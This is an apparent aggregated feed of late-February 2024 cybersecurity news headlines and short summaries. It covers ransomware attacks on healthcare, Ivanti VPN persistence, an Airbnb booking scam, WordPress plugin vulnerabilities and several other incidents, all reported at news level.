          Airbnb scam sends you to a fake Tripadvisor site, takes your money

          financial
          2024-02-29 https://www.malwarebytes.com/blog/news/2024/02/airbnb-scam-sends-you-to-a-fake-tripadvisor-site-takes-your-money
One of our researchers was targeted by a scammer advertising on Airbnb and hosting a fake Tripadvisor website.

Autosummary: If you would like to book our property, I need to know first some information about you, your name, your country and how many persons will stay with you in our property, also I want you to confirm me your email address. However, the link didn’t point to the real Tripadvisor site, but instead a fake one, which became clear when Malwarebytes Browser Guard popped up a warning advising Stefan not to continue. They replied, asking Stefan to book the property through Tripadvisor because, they said, the Airbnb platform was having some problems and the fees were higher than on Tripadvisor.


          Healthcare sector warned of ALPHV BlackCat ransomware after surge in targeted attacks

          exploits ransomware
          2024-02-29 https://www.tripwire.com/state-of-security/healthcare-sector-warned-alphv-blackcat-ransomware-after-surge-targeted-attacks
The US government has warned the healthcare sector that it is now the biggest target of the BlackCat ransomware group. Read more in my article on the Tripwire State of Security blog.

Autosummary: "Because of their actions, we are introducing new rules, or rather, we are removing ALL rules, except one, you cannot touch the CIS (critical infrastructure sectors), you can now block hospitals, nuclear power plants, anything, anywhere."


          Airbnb scammers pose as hosts, redirect users to fake Tripadvisor site

          financial
          2024-02-29 https://www.helpnetsecurity.com/2024/02/29/airbnb-scam/

          Scammers on Airbnb are faking technical issues and citing higher fees to get users to a spoofed Tripadvisor website and steal their money. The Airbnb scam Malwarebytes researchers came across the Airbnb scam when trying to book an apartment through the platform. The owner/scammer noted in the listing that those interested in booking the property should contact him by email to check for availability. The scammer replies to the victim’s email and tries to get … More

          The post Airbnb scammers pose as hosts, redirect users to fake Tripadvisor site appeared first on Help Net Security.


Autosummary: To add credibility to the scam, the victim receives another email, ostensibly from Tripadvisor’s platform, urging them to complete the booking by following the shortened URLs in the first email.


          CISA warns against using hacked Ivanti devices even after factory resets

          industry
          2024-02-29 https://www.bleepingcomputer.com/news/security/cisa-warns-against-using-hacked-ivanti-devices-even-after-factory-resets/
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) revealed today that attackers who breached Ivanti appliances using one of multiple actively exploited vulnerabilities can maintain root persistence even after performing factory resets. [...]

Autosummary: On February 1st, in response to the "substantial threat" and increased risk of security breaches posed by hacked Ivanti VPN appliances, CISA ordered all federal agencies to disconnect all Ivanti Connect Secure and Ivanti Policy Secure instances from their networks within 48 hours. The agencies were mandated to export configurations, factory reset them, rebuild them using patched software versions released by Ivanti, reimport the backed-up configs, and revoke all connected or exposed certificates, keys, and passwords to be able to bring the isolated devices back online.


          Citrix, Sophos software impacted by 2024 leap year bugs

          exploits
          2024-02-29 https://www.bleepingcomputer.com/news/software/citrix-sophos-software-impacted-by-2024-leap-year-bugs/
Citrix and Sophos products have been impacted by leap year flaws, leading to unexpected problems in their products. [...]

Autosummary: Alternatively, users can run the following command through an elevated command prompt as an administrator: net stop w32time & date 03-01-2024 & net start CtxHdxWebSocketService & net start w32time. Citrix says its engineering team is working on a fix for the issue so that users won't have this problem during the next leap year, on February 29th, 2028. If facing issues, disable SSL/TLS decryption manually; from March 1st, 2024, rebooting servers will address the problem, and settings should be reverted as desired.


          Golden Corral restaurant chain data breach impacts 183,000 people

          financial
          2024-02-29 https://www.bleepingcomputer.com/news/security/golden-corral-restaurant-chain-data-breach-impacts-183-000-people/
The Golden Corral American restaurant chain disclosed a data breach after attackers behind an August cyberattack stole the personal information of over 180,000 people. [...]



          New Bifrost malware for Linux mimics VMware domain for evasion

          exploits industry Linux
          2024-02-29 https://www.bleepingcomputer.com/news/security/new-bifrost-malware-for-linux-mimics-vmware-domain-for-evasion/
A new Linux variant of the Bifrost remote access trojan (RAT) employs several novel evasion techniques, including the use of a deceptive domain that was made to appear as part of VMware. [...]



          CISA cautions against using hacked Ivanti VPN gateways even after factory resets

          industry
          2024-02-29 https://www.bleepingcomputer.com/news/security/cisa-cautions-against-using-hacked-ivanti-vpn-gateways-even-after-factory-resets/
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) revealed today that attackers who hack Ivanti VPN appliances using one of multiple actively exploited vulnerabilities may be able to maintain root persistence even after performing factory resets. [...]

Autosummary: On February 1st, in response to the "substantial threat" and increased risk of security breaches posed by hacked Ivanti VPN appliances, CISA ordered all federal agencies to disconnect all Ivanti Connect Secure and Ivanti Policy Secure instances from their networks within 48 hours. The agencies were mandated to export configurations, factory reset them, rebuild them using patched software versions released by Ivanti, reimport the backed-up configs, and revoke all connected or exposed certificates, keys, and passwords to be able to bring the isolated devices back online.


          Bolivia floods: Homes destroyed and animals rescued

          latam
          2024-02-29 https://www.bbc.co.uk/news/world-latin-america-68441209
The mayor of Cobija, a city in the north, declares the area a disaster zone because of heavy rain.



          Pharmaceutical giant Cencora says data was stolen in a cyberattack

          ciber
          2024-02-28 https://www.bleepingcomputer.com/news/security/pharmaceutical-giant-cencora-says-data-was-stolen-in-a-cyberattack/
Pharmaceutical giant Cencora says it suffered a cyberattack in which threat actors stole data from corporate IT systems. [...]



          How AI is reshaping the cybersecurity job landscape

          ciber
          2024-02-28 https://www.helpnetsecurity.com/2024/02/28/ai-cybersecurity-jobs-impact/

          88% of cybersecurity professionals believe that AI will significantly impact their jobs, now or in the near future, and 35% have already witnessed its effects, according to ISC2’s AI study, AI Cyber 2024. Impact of AI on cybersecurity professionals While there is considerable positivity about the role of AI in dealing with cyberattacks, these findings also recognize the urgent demand from professionals for industry preparedness to mitigate cyber risks and safeguard the entire ecosystem. The … More

          The post How AI is reshaping the cybersecurity job landscape appeared first on Help Net Security.


Autosummary: AI is everywhere, and while the cybersecurity industry was quick to adopt AI and ML as part of its latest generation of defensive and monitoring technologies, so too have the bad actors, who are leaning on the same technology to elevate the sophistication, speed, and accuracy of their own cybercrime activities.


          AI in cybersecurity presents a complex duality

          ciber
          2024-02-28 https://www.helpnetsecurity.com/2024/02/28/grc-solutions-need/

          Companies more than ever view GRC (Governance, Risk, and Compliance) as a holistic process and are taking steps toward getting a complete view of their risk environment and compliance obligations, according to Hyperproof. Centralized GRC strategy gains momentum Centralizing strategy, unifying risk and compliance data, and revamping the approach to cybersecurity are becoming more popular strategic objectives among respondents, especially with the rise of AI technology dismantling barriers and fostering collaboration among various GRC functions. … More

          The post AI in cybersecurity presents a complex duality appeared first on Help Net Security.


Autosummary: Only 19% of respondents manage IT risks in siloed departments, processes, or tools, a 31% decrease from 2023, and 18% of respondents have an integrated view of managing their unique set of risks, an increase of 80% year-over-year.


          TimbreStealer Malware Spreading via Tax-themed Phishing Scam Targets IT Users

          financial exploits
          2024-02-28 https://thehackernews.com/2024/02/timbrestealer-malware-spreading-via-tax.html
Mexican users have been targeted with tax-themed phishing lures at least since November 2023 to distribute a previously undocumented Windows malware called TimbreStealer. Cisco Talos, which discovered the activity, described the authors as skilled and that the "threat actor has previously used similar tactics, techniques and procedures (TTPs) to distribute a banking trojan known



Cybersecurity Agencies Warn Ubiquiti EdgeRouter Users of APT28's MooBot Threat

          ciber
          2024-02-28 https://thehackernews.com/2024/02/cybersecurity-agencies-warn-ubiquiti.html
In a new joint advisory, cybersecurity and intelligence agencies from the U.S. and other countries are urging users of Ubiquiti EdgeRouter to take protective measures, weeks after a botnet comprising infected routers was felled by law enforcement as part of an operation codenamed Dying Ember. The botnet, named MooBot, is said to have been used by a Russia-linked threat actor known as



          Change Healthcare outages reportedly caused by ransomware

          exploits ransomware
          2024-02-28 https://www.malwarebytes.com/blog/news/2024/02/change-healthcare-outages-reportedly-caused-by-ransomware
The cyberattack on Change Healthcare that has been causing a lot of disruptions is likely the work of the BlackCat/ALPHV ransomware gang.

Autosummary: What the ramifications of any stolen data are remains to be seen, but they could be very serious given the size of the company and the nationwide application of their electronic health record (EHR) systems, payment processing, care coordination, and data analytics. Once you’ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again. This platform is the largest payment exchange platform between doctors, pharmacies, healthcare providers, and patients in the US healthcare system.


          State-sponsored hackers know enterprise VPN appliances inside out

          government
          2024-02-28 https://www.helpnetsecurity.com/2024/02/28/hackers-enterprise-vpn-appliances/

          Suspected Chinese state-sponsored hackers leveraging Ivanti Connect Secure VPN flaws to breach a variety of organizations have demonstrated “a nuanced understanding of the appliance”, according to Mandiant incident responders and threat hunters. They were able to perform a number of modifications on the device and deploy specialized malware and plugins aimed at achieving persistence across system upgrades, patches, and factory resets. “While the limited attempts observed to maintain persistence have not been successful to date … More

          The post State-sponsored hackers know enterprise VPN appliances inside out appeared first on Help Net Security.


Autosummary: In some cases, after exploiting CVE-2024-21893, the attackers used plugins for SparkGateway – a legitimate component of the Ivanti Connect Secure appliance – to modify its configuration file, inject shared objects and re-deploy backdoors after system upgrade events, patches, and factory resets.


          Superusers Need Super Protection: How to Bridge Privileged Access Management and Identity Management

          latam
          2024-02-28 https://thehackernews.com/2024/02/superusers-need-super-protection-how-to.html
Traditional perimeter-based security has become costly and ineffective. As a result, communications security between people, systems, and networks is more important than blocking access with firewalls. On top of that, most cybersecurity risks are caused by just a few superusers – typically one out of 200 users. There’s a company aiming to fix the gap between traditional PAM and IdM

Autosummary: Let's quickly review what PIM, PAM, and IAM focus on: PIM – management of root user identities and authorizations; PAM – management of root user access to critical resources and auditing; IAM – management of basic user identities, authorizations, and access to resources. Not all digital identities are created equal – superusers need super protection. Think about this: Your typical user probably needs access to regular office tools, like your CRM or M365.


          Need to Know: Key Takeaways from the Latest Phishing Attacks

          financial
          2024-02-28 https://www.bleepingcomputer.com/news/security/need-to-know-key-takeaways-from-the-latest-phishing-attacks/
This article takes a look at some lessons from recent phishing attacks and highlights actionable tips to limit the risks of phishing affecting your company. [...]

Autosummary: What organizations can do to limit phishing risks: in the face of rampant phishing attacks that can cause large-scale data breaches, here are some ways you can limit phishing risks. Theoretical training helps your employees understand different phishing tactics used by attackers, such as email phishing, spear phishing, and whaling. (Figure: Blink automated workflow – Report on MFA Gaps in Okta.) How security automation can help: building automated security workflows limits phishing risks by streamlining incident response.


          Savvy Seahorse gang uses DNS CNAME records to power investor scams

          financial
          2024-02-28 https://www.bleepingcomputer.com/news/security/savvy-seahorse-gang-uses-dns-cname-records-to-power-investor-scams/
A threat actor named Savvy Seahorse is abusing DNS (Domain Name System) CNAME records to create a traffic distribution system that powers financial scam campaigns. [...]

Autosummary: Campaign details: Savvy Seahorse promotes investment scams with lures written in English, Russian, Polish, Italian, German, French, Spanish, Czech, and Turkish, indicating the threat actor's global targeting scope.


          European retailer Pepco loses €15.5 million in phishing (possibly BEC?) attack

          financial
          2024-02-28 https://www.helpnetsecurity.com/2024/02/28/pepco-phishing-bec-attack/

          Pepco Group has confirmed that its Hungarian business has been hit by a “sophisticated fraudulent phishing attack.” The European company, which operates shops under the Pepco, Poundland and Dealz brands, said that the company lost approximately €15.5 million in cash as a consequence of the attack. “It is unclear at this stage whether the funds can be recovered, although Pepco is pursuing various efforts through its banking partners and the police. At this stage, the … More

          The post European retailer Pepco loses €15.5 million in phishing (possibly BEC?) attack appeared first on Help Net Security.


Autosummary: Pepco says it’s a phishing attack, but it might also be business email compromise. “Based on the company statement, it sounds like it has been the victim of a social engineering attack, which led to the accidental transfer of money to fraudsters,” Irene Coyle, chief operating officer at OSP Cyber Academy, told Help Net Security.


          FBI Warns U.S. Healthcare Sector of Targeted BlackCat Ransomware Attacks

          exploits ransomware
          2024-02-28 https://thehackernews.com/2024/02/fbi-warns-us-healthcare-sector-of.html
The U.S. government is warning about the resurgence of BlackCat (aka ALPHV) ransomware attacks targeting the healthcare sector as recently as this month. "Since mid-December 2023, of the nearly 70 leaked victims, the healthcare sector has been the most commonly victimized," the government said in an updated advisory. "This is likely in response to the ALPHV/BlackCat administrator's

Autosummary: Attack surface management firm Censys said, as of February 27, 2024, it observed no less than 3,400 exposed potentially vulnerable ScreenConnect hosts online, with a majority of them located in the U.S., Canada, the U.K., Australia, Germany, France, India, the Netherlands, Turkey, and Ireland.


          FBI, CISA, HHS warn of targeted ALPHV/Blackcat ransomware attacks against the healthcare sector

          exploits ransomware
          2024-02-28 https://securityaffairs.com/159703/cyber-crime/alphv-blackcat-ransomware-healthcare-sector.html
The FBI, CISA, and the Department of HHS warned U.S. healthcare organizations of targeted ALPHV/Blackcat ransomware attacks. A cybersecurity alert published by the FBI, CISA, and the Department of Health and Human Services (HHS) warned U.S. healthcare organizations of targeted attacks conducted by the ALPHV/Blackcat ransomware group. The US agencies released a report containing IOCs and […]

Autosummary: Pierluigi Paganini, February 28, 2024. The FBI, CISA, and the Department of HHS warned U.S. healthcare organizations of targeted ALPHV/Blackcat ransomware attacks.


          Rhysida ransomware wants $3.6 million for children’s stolen data

          exploits ransomware
          2024-02-28 https://www.bleepingcomputer.com/news/security/rhysida-ransomware-wants-36-million-for-childrens-stolen-data/
The Rhysida ransomware gang has claimed the cyberattack on Lurie Children's Hospital in Chicago at the start of the month. [...]

Autosummary: Lurie Children's still impaired: as per the latest status update from Lurie Children's on February 22, 2024, the effort to restore the IT system is ongoing, and service disruptions still impact some operational segments.


          Kali Linux 2024.1 released with 4 new tools, UI refresh

          Linux
          2024-02-28 https://www.bleepingcomputer.com/news/security/kali-linux-20241-released-with-4-new-tools-ui-refresh/
Kali Linux has released version 2024.1, the first version of 2024, with four new tools, a theme refresh, and desktop changes. [...]

Autosummary: Below are the four new tools added in Kali 2024.1: blue-hydra – Bluetooth device discovery service; opentaxii – TAXII server implementation from EclecticIQ; readpe – command-line tools to manipulate Windows PE files; snort – flexible Network Intrusion Detection System. In addition to the new tools, Kali says they upgraded the kernel version to 6.6.


          Ransomware gang claims they stole 6TB of Change Healthcare data

          exploits
          2024-02-28 https://www.bleepingcomputer.com/news/security/ransomware-gang-claims-they-stole-6tb-of-change-healthcare-data/
The BlackCat/ALPHV ransomware gang has officially claimed responsibility for a cyberattack on Optum, a subsidiary of UnitedHealth Group (UHG), which led to an ongoing outage affecting the Change Healthcare platform. [...]



          LockBit ransomware returns to attacks with new encryptors, servers

          exploits ransomware
          2024-02-28 https://www.bleepingcomputer.com/news/security/lockbit-ransomware-returns-to-attacks-with-new-encryptors-servers/
The LockBit ransomware gang is once again conducting attacks, using updated encryptors with ransom notes linking to new servers after last week's law enforcement disruption. [...]

Autosummary: As part of this operation, law enforcement seized infrastructure, retrieved decryptors, and, in an embarrassing moment for LockBit, converted the ransomware gang's data leak site into a police press portal.


          Lazarus hackers exploited Windows zero-day to gain Kernel privileges

          exploits Linux
          2024-02-28 https://www.bleepingcomputer.com/news/security/lazarus-hackers-exploited-windows-zero-day-to-gain-kernel-privileges/
North Korean threat actors known as the Lazarus Group exploited a flaw in the Windows AppLocker driver (appid.sys) as a zero-day to gain kernel-level access and turn off security tools, allowing them to bypass noisy BYOVD (Bring Your Own Vulnerable Driver) techniques. [...]

Autosummary: (Figure: direct syscalls used in the exploit; source: Avast.) The FudModule rootkit, built within the same module as the exploit, executes direct kernel object manipulation (DKOM) operations to turn off security products, hide malicious activities, and maintain persistence on the breached system.


          Stopping a targeted attack on a Managed Service Provider (MSP) with ThreatDown MDR

          Telcos
          2024-02-28 https://www.malwarebytes.com/blog/business/2024/02/stopping-a-targeted-attack-on-a-managed-service-provider-msp-with-threatdown-mdr
Detecting and disrupting a months-long malware campaign on an MSP.

Autosummary: MSPs continue to be a prime target in cyber attacks—and as we’ve seen in this case study, attackers are in it for the long haul, able to remain undetected for several months after compromising a network. The attacker’s use of legitimate tools such as TeamViewer, ScreenConnect, and PowerShell in their months-long attack on the MSP underscores a key theme we’ve been writing about on the blog recently: attackers are increasingly relying on LOTL techniques in their attacks to avoid detection.


          Matthew Perry’s Twitter account hacked by cryptocurrency scammers

          financial
          2024-02-28 https://www.bitdefender.com/blog/hotforsecurity/matthew-perrys-twitter-account-hacked-by-cryptocurrency-scammers/
Matthew Perry's official Twitter account was hijacked by scammers this week who attempted to solicit donations from well-meaning fans of the much-loved late actor. The post asked for cryptocurrency donations "to support our mission in battling addiction." Read more in my article on the Hot for Security blog.



          Pharmaceutical giant Cencora discloses a data breach

          financial
          2024-02-28 https://securityaffairs.com/159716/data-breach/cencora-discloses-data-breach.html
Pharmaceutical giant Cencora suffered a cyber attack and threat actors stole data from its infrastructure. Pharmaceutical giant Cencora disclosed a data breach after it was the victim of a cyberattack. Cencora, Inc., formerly known as AmerisourceBergen, is an American drug wholesale company and a contract research organization that was formed by the merger of Bergen Brunswig and AmeriSource in 2001. […]

Autosummary: “On February 21, 2024, Cencora, Inc. (the “Company”), learned that data from its information systems had been exfiltrated, some of which may contain personal information.”


          UnitedHealth subsidiary Optum hack linked to BlackCat ransomware

          exploits ransomware
          2024-02-27 https://www.bleepingcomputer.com/news/security/unitedhealth-subsidiary-optum-hack-linked-to-blackcat-ransomware/
A cyberattack on UnitedHealth Group subsidiary Optum that led to an ongoing outage impacting the Change Healthcare payment exchange platform was linked to the BlackCat ransomware group by sources familiar with the investigation. [...]

Autosummary: Optum Solutions, its subsidiary, operates the Change Healthcare platform, the largest payment exchange platform connecting doctors, pharmacies, healthcare providers, and patients in the U.S. healthcare system.


          Octopus Deploy acquires Codefresh to drive innovation in continuous delivery

          ransomware
          2024-02-27 https://www.helpnetsecurity.com/2024/02/27/octopus-deploy-codefresh-acquisition/

Octopus Deploy announced the acquisition of Codefresh. Codefresh, founded in 2014 by Oleg Verhovsky and Raziel Tabib, is an Argo maintainer and a leader in Kubernetes CD, GitOps, and CI. The acquisition marks a significant milestone as Octopus strengthens its support for Kubernetes and its commitment to providing a powerful continuous delivery platform for virtual machines and cloud-native enterprise-scale applications. The combined business positions Octopus Deploy as one of the largest privately held companies in the DevOps ecosystem. … More

          The post Octopus Deploy acquires Codefresh to drive innovation in continuous delivery appeared first on Help Net Security.


          Autosummary: Octopus and Codefresh offer unparalleled benefits for software teams, including advanced CD, deployment automation, release orchestration, environment progression, observability, and enterprise compliance across all workloads. "


          Overcoming the pressures of cybersecurity startup leadership

          ciber
          2024-02-27 https://www.helpnetsecurity.com/2024/02/27/kunal-agarwal-dope-security-cybersecurity-startup-leadership/

          In this Help Net Security interview, Kunal Agarwal, CEO at Dope Security, offers a look into the CEO’s leadership philosophy, the process of building a high-caliber team, and the unique challenges of navigating a startup in the tech industry. Dope Security was recently featured in our 10 cybersecurity startups to watch in 2024 roundup. What is your leadership philosophy as a CEO, and how has it evolved since you started the company? I’m a big … More


          Autosummary: In this Help Net Security interview, Kunal Agarwal, CEO at Dope Security, offers a look into the CEO’s leadership philosophy, the process of building a high-caliber team, and the unique challenges of navigating a startup in the tech industry. Last, relationships are everything – from raising money, hiring your team, building the product, and selling it. Overall, the venture is a different complexity because there’s always that external pressure, high burn rates, and time-to-live. "


          WordPress Plugin Alert - Critical SQLi Vulnerability Threatens 200K+ Websites

          exploits
          2024-02-27 https://thehackernews.com/2024/02/wordpress-plugin-alert-critical-sqli.html
          A critical security flaw has been disclosed in a popular WordPress plugin called Ultimate Member that has more than 200,000 active installations. The vulnerability, tracked as CVE-2024-1071, carries a CVSS score of 9.8 out of a maximum of 10. Security researcher Christiaan Swiers has been credited with discovering and reporting the flaw. In an advisory published last week, WordPress "

          Autosummary: It also follows the discovery of a new drainer-as-a-service (DaaS) scheme called CG (short for CryptoGrab) that runs a 10,000-member-strong affiliate program comprised of Russian, English, and Chinese speakers. "


          Zyxel fixed four bugs in firewalls and access points

          exploits
          2024-02-27 https://securityaffairs.com/159624/hacking/zyxel-firewalls-aps-flaws.html
          Taiwanese vendor Zyxel warns of security vulnerabilities in its firewalls and access points, including a remote code execution flaw. Taiwanese networking vendor Zyxel addressed four vulnerabilities, respectively tracked as CVE-2023-6397, CVE-2023-6398, CVE-2023-6399, and CVE-2023-6764, in its firewalls and access points. The flaws can be exploited by threat actors to carry out command injection and denial-of-service attacks and to […] "



          Android banking trojans: How they steal passwords and drain bank accounts

          financial exploits
          2024-02-27 https://www.malwarebytes.com/blog/news/2024/02/android-banking-trojans-how-they-steal-passwords-and-drain-bank-accounts
          Android banking trojans are a serious cyberthreat to everyday users that, through clever trickery, steal passwords and drain bank accounts. "

Autosummary: The idea behind Android banking trojans—and all cyber trojans—is simple: Much like the fabled “Trojan Horse” which, the story goes, carried a violent surprise for the city of Troy, Android banking trojans can be found on the internet disguised as benign, legitimate mobile apps that, once installed on a device, reveal more sinister intentions. Once installed on a device, “RecoverFiles” asked for access to “photos, videos, music, and audio on this device,” along with extra permissions to access files, map and talk to other apps, and even send payments via Google Play. By masquerading as everyday mobile apps for things like QR code readers, fitness trackers, and productivity or photography tools, Android banking trojans intercept a person’s online interest in one app, and instead deliver a malicious tool that cybercriminals can abuse later on. "


          Five Eyes Agencies Expose APT29"s Evolving Cloud Attack Tactics

          industry
          2024-02-27 https://thehackernews.com/2024/02/five-eyes-agencies-expose-apt29s.html
          Cybersecurity and intelligence agencies from the Five Eyes nations have released a joint advisory detailing the evolving tactics of the Russian state-sponsored threat actor known as APT29. The hacking outfit, also known as BlueBravo, Cloaked Ursa, Cozy Bear, Midnight Blizzard (formerly Nobelium), and The Dukes, is assessed to be affiliated with the Foreign Intelligence Service (SVR) of the "



          New Hugging Face Vulnerability Exposes AI Models to Supply Chain Attacks

          exploits
          2024-02-27 https://thehackernews.com/2024/02/new-hugging-face-vulnerability-exposes.html
Cybersecurity researchers have found that it's possible to compromise the Hugging Face Safetensors conversion service to ultimately hijack the models submitted by users and result in supply chain attacks. "It's possible to send malicious pull requests with attacker-controlled data from the Hugging Face service to any repository on the platform, as well as hijack any models that are submitted "

          Autosummary: "This data leaking can have severe security consequences, especially given the rise of ML systems, where local memory is used to store model inputs, outputs, and weights," security researchers Tyler Sorensen and Heidy Khlaaf said. "


          US pharmacy outage caused by Blackcat ransomware attack on Optum Solutions

          exploits ransomware
          2024-02-27 https://securityaffairs.com/159641/cyber-crime/blackcat-ransomware-attack-optum-solutions.html
          A BlackCat ransomware attack hit UnitedHealth Group subsidiary Optum causing an outage impacting the Change Healthcare payment exchange platform. A ransomware attack hit the UnitedHealth Group subsidiary Optum leading to an outage impacting the Change Healthcare payment exchange platform. Optum Solutions is a subsidiary of UnitedHealth Group, a leading health insurance company in the United States. Optum Solutions […] "

          Autosummary: The seizure is the result of a joint operation conducted by international law enforcement agencies from the US, Denmark, Germany, UK, Netherlands, Germany, Australia, Spain, Austria and Europol. BlackCat/ALPHV ransomware gang has been active since November 2021, the list of its victims is long and includes industrial explosives manufacturer SOLAR INDUSTRIES INDIA, the US defense contractor NJVC, gas pipeline Creos Luxembourg S.A., the fashion giant Moncler, the Swissport, NCR, and Western Digital. "


          Hesse Consumer Advice Center says systems encrypted by ransomware

          exploits ransomware
          2024-02-27 https://www.bleepingcomputer.com/news/security/hesse-consumer-advice-center-says-systems-encrypted-by-ransomware/
The Hesse Consumer Advice Center in Germany has been hit with a ransomware attack, causing IT systems to shut down and disrupting the availability of its services. [...] "

          Autosummary: The Hesse Consumer Advice Center is an organization that provides unbiased advice to the residents of Hesse about consumer law, telephone and internet, finance and insurance, energy saving, health and care, food and nutrition. "


          VIAVI enhances Observer Sentry’s exposure and vulnerability analysis

          exploits
          2024-02-27 https://www.helpnetsecurity.com/2024/02/27/viavi-observer-sentry-traffic-visibility/

          VIAVI Solutions announced the addition of traffic analysis capabilities to its Observer Sentry Software-as-a-Service-based threat exposure management solution. With traffic visibility, Observer Sentry goes beyond identifying unintended and potentially dangerous exposures, and enables SecOps, DevOps and cloud architects to determine if a vulnerability has been exploited. Observer Sentry audits security groups, access control lists, firewall rules and other sources of configuration to identify resources and relationships across all AWS accounts. This analysis locates the misconfigurations … More




          WordPress LiteSpeed Plugin Vulnerability Puts 5 Million Sites at Risk

          exploits
          2024-02-27 https://thehackernews.com/2024/02/wordpress-litespeed-plugin.html
          A security vulnerability has been disclosed in the LiteSpeed Cache plugin for WordPress that could enable unauthenticated users to escalate their privileges. Tracked as CVE-2023-40000, the vulnerability was addressed in October 2023 in version 5.7.0.1. "This plugin suffers from unauthenticated site-wide stored [cross-site scripting] vulnerability and could allow any unauthenticated user "



          Open-Source Xeno RAT Trojan Emerges as a Potent Threat on GitHub

          exploits
          2024-02-27 https://thehackernews.com/2024/02/open-source-xeno-rat-trojan-emerges-as.html
          An "intricately designed" remote access trojan (RAT) called Xeno RAT has been made available on GitHub, making it available to other actors at no extra cost. Written in C# and compatible with Windows 10 and Windows 11 operating systems, the open-source RAT comes with a "comprehensive set of features for remote system management," according to its developer, who goes by the name moom825 "



          Oil spill spreads across Caribbean to Bonaire

          industry
          2024-02-27 https://www.bbc.co.uk/news/world-latin-america-68413102
The oil from a capsized barge off the coast of Tobago is threatening Bonaire's mangrove forests. "



          LabHost cybercrime service lets anyone phish Canadian bank users

          financial
          2024-02-27 https://www.bleepingcomputer.com/news/security/labhost-cybercrime-service-lets-anyone-phish-canadian-bank-users/
The Phishing as a Service (PhaaS) platform "LabHost" has been helping cybercriminals target North American banks, particularly financial institutions in Canada, causing a notable increase in activity. [...] "

          Autosummary: Other notable PhaaS platforms researchers have warned about recently are "Greatness" and "Robin Banks," both launched in mid-2022, featuring MFA bypassing, custom phishing kits, and admin panels. "


          Black Basta, Bl00dy ransomware gangs join ScreenConnect attacks

          exploits ransomware
          2024-02-27 https://www.bleepingcomputer.com/news/security/black-basta-bl00dy-ransomware-gangs-join-screenconnect-attacks/
          The Black Basta and Bl00dy ransomware gangs have joined widespread attacks targeting ScreenConnect servers unpatched against a maximum severity authentication bypass vulnerability. [...] "

          Autosummary: ScreenConnect attack flow (Trend Micro) ​While investigating their attacks, Trend Micro observed reconnaissance, discovery, and privilege escalation activity after the attackers gained access to the network and Black Basta-linked Cobalt Strike beacons being deployed on compromised systems. "


          Russian hackers hijack Ubiquiti routers to launch stealthy attacks

          rusia-ucrania
          2024-02-27 https://www.bleepingcomputer.com/news/security/russian-hackers-hijack-ubiquiti-routers-to-launch-stealthy-attacks/
          Russian APT28 military hackers are using compromised Ubiquiti EdgeRouters to evade detection, the FBI says in a joint advisory issued with the NSA, the U.S. Cyber Command, and international partners. [...] "

Autosummary: Military Unit 26165 cyberspies, part of Russia's Main Intelligence Directorate of the General Staff (GRU) and tracked as APT28 and Fancy Bear, are using these hijacked and very popular routers to build extensive botnets that help them steal credentials, collect NTLMv2 digests, and proxy malicious traffic. "


          Hessen Consumer Center says systems encrypted by ransomware

          exploits ransomware
          2024-02-27 https://www.bleepingcomputer.com/news/security/hessen-consumer-center-says-systems-encrypted-by-ransomware/
          The Hessen Consumer Center in Germany has been hit with a ransomware attack, causing IT systems to shut down and temporarily disrupting its availability. [...] "

Autosummary: The Hessen Consumer Center is a non-profit organization that aims to provide unbiased and neutral advice to the residents of Hessen about consumer law, telephone and internet, finance and insurance, energy saving, health and care, food and nutrition. "


          FBI, CISA warn US hospitals of targeted BlackCat ransomware attacks

          exploits ransomware
          2024-02-27 https://www.bleepingcomputer.com/news/security/fbi-cisa-warn-us-hospitals-of-targeted-blackcat-ransomware-attacks/
          Today, the FBI, CISA, and the Department of Health and Human Services (HHS) warned U.S. healthcare organizations of targeted ALPHV/Blackcat ransomware attacks. [...] "

Autosummary: BlackCat now using ScreenConnect for initial access Today's advisory comes after the BlackCat ransomware operation was linked to a cyberattack on UnitedHealth Group subsidiary Optum that triggered an ongoing outage impacting Change Healthcare, the largest payment exchange platform connecting doctors, pharmacies, healthcare providers, and patients in the U.S. healthcare system. "


          Black Basta and Bl00dy ransomware gangs exploit recent ConnectWise ScreenConnect bugs

          exploits ransomware
          2024-02-27 https://securityaffairs.com/159640/cyber-crime/black-basta-bl00dy-ransomware-connectwise-screenconnect.html
          New threat actors have started exploiting ConnectWise ScreenConnect vulnerabilities, including the Black Basta and Bl00dy ransomware gangs. Multiple threat actors have started exploiting the recently disclosed vulnerabilities, tracked as CVE-2024-1709 (CVSS score of 10) and CVE-2024-1708 (CVSS score of 8.4), in the ConnectWise ScreenConnect software. ConnectWise recently warned of the following two critical vulnerabilities in […] "

Autosummary: New threat actors have started exploiting ConnectWise ScreenConnect vulnerabilities, including the Black Basta and Bl00dy ransomware gangs. "


          Brazil ex-leader Bolsonaro denies coup allegations

          latam
          2024-02-26 https://www.bbc.co.uk/news/world-latin-america-68398676
          Jair Bolsonaro, who lost to his bitter rival in 2022, tells a rally he is a victim of political persecution. "



          Cybersecurity crisis in schools

          ciber
          2024-02-26 https://www.helpnetsecurity.com/2024/02/26/education-sector-cyberattacks/

          Primary school systems handle sensitive data concerning minors, while higher education institutions must safeguard intellectual property data, making them prime targets for cyberattacks, according to Trustwave. These attacks not only threaten the safety and security of teachers and administrators but also put the privacy of students, staff, and other associated entities at risk. With millions of students now learning through technology in hybrid, remote, or in-class settings, device security is no longer optional. It’s crucial … More


Autosummary: The education sector, like many others, relies heavily on third-party vendors such as software-as-a-service, hosting providers, storage, and IT services for various functions, including learning management systems, email, and communication and collaboration tools. Exposed systems & services: Publicly accessible network devices like servers, building management systems, access systems, and cameras lack proper security, increasing risk. "


          LockBit is back and threatens to target more government organizations

          government ransomware
          2024-02-26 https://securityaffairs.com/159584/cyber-crime/lockbit-gang-resumed-raas.html
          The LockBit gang is back and set up a new infrastructure after the recent attempt by law enforcement to disrupt their operation. Last week, a joint law enforcement action, code-named Operation Cronos, conducted by law enforcement agencies from 11 countries disrupted the LockBit ransomware operation. The operation led to the arrest of two members of the ransomware gang […] "

